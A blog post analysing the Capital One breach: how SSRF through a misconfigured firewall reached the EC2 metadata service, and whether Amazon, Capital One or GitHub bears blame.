Capital One Breach

Was Amazon at fault?

I was asked a question around the Capital One breach. It seems that, in some areas, fingers are being pointed at Amazon, and they should be held (at least partly) to blame for this.

It also seems as if Senator Wyden is also asking Amazon questions around this.

There’s also a question around Paige Thompson, the hacker, and her previous relationship as an Amazon employee. If she used any insider knowledge to break into Capital One then this would erode a lot of trust in Amazon’s Web Services, and the public cloud in general.

And, finally, were code repo’s used in the attack? Is there a whole supply chain issue, here?

Now I’m not convinced about any of this. Pretty much all the chatter I’ve heard in the InfoSec communities was “It’s all Capital One’s fault”.

It’s not 100% clear from the indictment, but it looks like the attacker made use of SSRF on the WAF to access the ec2 metadata URL, which included role credentials and those credentials were overly broad and gave access to S3 buckets.

It’s also not clear if this was a AWS WAF, or a hosted WAF (eg Imperva WAF, F5 WAF) on an EC2 instance.

So the first set of questions I have are:

  • Why didn’t the WAF block the metadata URL?
  • Why was the WAF EC2 instance associated with an IAM role?
  • Why was the role overly broad?
  • Why wasn’t the data encrypted in the bucket?

Out of all of this, Amazon themselves may be partially implicated

  • If it was an AWS WAF, why doesn’t that block the metadata URL by default?
  • Did the attacker make use of knowledge obtained when she was working for Amazon 3 years earlier?

So it’s really really looking like a pure Capital One misconfiguration.

It is Interesting that Capital One created Cloud Custodian to try and detect misconfigs :-) It’s clear that detection is a hard topic, and not necessarily so good for those “unknown” edge cases.

Note: S3 server-side encryption is inadequate because the service will decrypt data automatically if you get the right credentials. I consider it the equivalent of “block device encryption” or “TDE - Total Database Encryption”; an SA or a DBA can still get to the data, and app level encryption is still required. Indeed, I wrote about this 2 years ago!.

So I’m not willing to point fingers at Amazon at this stage.

I don’t think code repos were used in the attack; at least this time there wasn’t a supply chain issue! But the attacker did put her results into github, and that may be where some of the confusion came from. There’s at least one suit being brought against github for allowing this data to be stored there

Senator Rob Wyden’s letter looks a lot like a fishing expedition along the lines of “your customers keep f***ing up; what are you going to do about it?“, with a side helping of “you created something easily broken; you hold some responsibility”.

The thing is that SSRF attacks have been known for a long time. Indeed the OWASP page for them explicitly mentions the metadata service as an example… and that’s from 2017.

Cloud server meta-data - Cloud services such as AWS provide a REST interface on http://169.254.169.254/ where important configuration and sometimes even authentication keys can be extracted

So that adds a new question

  • Why didn’t Capital One pentesters discover this?

Now as I was writing this up I came across Amazon’s reply to Senator Wyden.

It doesn’t really clear up the WAF question, although it feels to me as if they’re talking about third-party WAFs. They’re definitely putting the blame at Capital One’s feet:

As Capital One outlined in their public announcement, the attack occurred due to a misconfiguration error at the application layer of a firewall installed by Capital One, exacerbated by permissions set by Capital One there were likely broader than intended.

One interesting part of the letter is that they’re going to start scanning their public IP ranges for similar misconfigs, and alert customers. This is similar to other sorts of scanning that Amazon pro-actively do (e.g. searching github for API credentials).

Is this tacit acknowledgment that they are partially to blame? Maybe :-)

My conclusions are:

  • AWS are not to blame for the breach
    • AWS may have made it too easy for misconfigs to happen
  • Github was not used to create the attack; it just stored the results
  • This is a pure Capital One f**k up

Summary:

I really am not a fan of the AWS security model; there’s far far too many knobs and controls, and it’s not clear how the interact with each other. It can be hard to even know something simple (“Is this server port 22 open to the internet?“) because of how configurations interact (security groups, routing tables, network ACLs, etc etc).

It is critical that any company using the public cloud understand the technology they are using. Just because Amazon provide 100+ services doesn’t mean you properly understand how to secure them. How many data breaches have occurred because of backups in insecure S3 buckets, for example?

In the Capital One case, SSRFs and the metadata URL are well known. It should have been detected during application security testing. There’s more than one problem, here!